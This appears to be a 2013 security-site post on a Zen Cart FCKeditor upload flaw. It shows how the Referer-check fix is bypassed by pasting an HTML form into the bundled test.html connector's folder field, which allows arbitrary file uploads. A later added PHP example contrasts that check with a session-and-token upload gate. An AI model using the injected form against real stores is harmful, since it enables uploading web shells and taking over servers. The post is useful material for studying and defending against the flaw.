zencart editors/fckeditor: secondary exploitation after the vulnerability fix

ID MYHACK58:62201336643
Type myhack58
Reporter Anonymous
Modified 2013-01-09T00:00:00


Vulnerable file: editors/fckeditor/editor/filemanager/upload/php/upload.php

The fix given online is either to remove the FCK editor and use another editor, or to open editors/fckeditor/editor/filemanager/upload/php/upload.php and, below the lines

    require('config.php');
    require('util.php');

add the following code:

    // Prevent outside submission
    function outsidepost()
    {
        $servername = $_SERVER['SERVER_NAME'];
        $sub_from = @$_SERVER['HTTP_REFERER'];
        $sub_len = strlen($servername);
        // Skip the 7 characters of "http://" and take the host part of the Referer
        $checkfrom = substr($sub_from, 7, $sub_len);
        // Reject the request when the Referer host is not this server
        if ($checkfrom != $servername) {
            echo("you don't outsidepost!");
            exit;
        }
    }
    outsidepost();

This prevents outside submission, but it does not prevent internal submission.

Method of use:

1. Open editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
2. In the Current Folder box, enter:

    <form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>

Then click Get Folders and Files and an upload form will appear; you can upload any file type.

PS: If the editors and upload folders are set to return 403, 500 or 404, this method does not work.
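
A Referer comparison is satisfied by any form submitted from a page the site itself serves, which is why the check above stops only outside submission. The following added example (not Zen Cart or FCKeditor code, and not from the original post) sets that check beside a gate based on an authenticated session, a per-session token and an extension allowlist; the session keys admin_id and upload_token, the host shop.example and the allowed extensions are assumptions.

```php
<?php
// Added example; not Zen Cart or FCKeditor code. Session keys 'admin_id' and
// 'upload_token' and the extension list are assumptions for illustration.

// The Referer-only test from the fix: true whenever the header names this host,
// so a form submitted from any page the site itself serves passes it.
function referer_only_check(array $server): bool
{
    $host = (string)($server['SERVER_NAME'] ?? '');
    $from = (string)($server['HTTP_REFERER'] ?? '');
    return substr($from, 7, strlen($host)) === $host;
}

// Gate that does not depend on request headers the client controls.
function upload_allowed(array $session, array $post, array $file): bool
{
    if (empty($session['admin_id'])) {
        return false; // no authenticated administrator session
    }
    $expected = $session['upload_token'] ?? '';
    $supplied = $post['upload_token'] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === ''
        || !hash_equals($expected, $supplied)) {
        return false; // token missing or not the one issued to this session
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return false;
    }
    // Exactly one extension and a conservative character set in the name.
    $name = basename((string)($file['name'] ?? ''));
    if (!preg_match('/^[A-Za-z0-9_-]+\.([A-Za-z0-9]+)$/', $name, $m)) {
        return false;
    }
    return in_array(strtolower($m[1]), ['jpg', 'jpeg', 'png', 'gif'], true);
}

// Constructed request: same-site Referer, no session, non-image file name.
$server = [
    'SERVER_NAME'  => 'shop.example',
    'HTTP_REFERER' => 'http://shop.example/editors/fckeditor/editor/filemanager/browser/default/connectors/test.html',
];
$file = ['name' => 'sample.php', 'error' => UPLOAD_ERR_OK];
var_dump(referer_only_check($server));
var_dump(upload_allowed([], [], $file));
// Constructed request: logged-in session, matching token, image file name.
$session = ['admin_id' => 1, 'upload_token' => 'constructed-token'];
$post = ['upload_token' => 'constructed-token'];
var_dump(upload_allowed($session, $post, ['name' => 'photo.jpg', 'error' => UPLOAD_ERR_OK]));
```

Run with the PHP CLI (PHP 7 or later), the Referer check accepts the first constructed request while the gate rejects it, and the gate accepts the second request that carries a session and matching token.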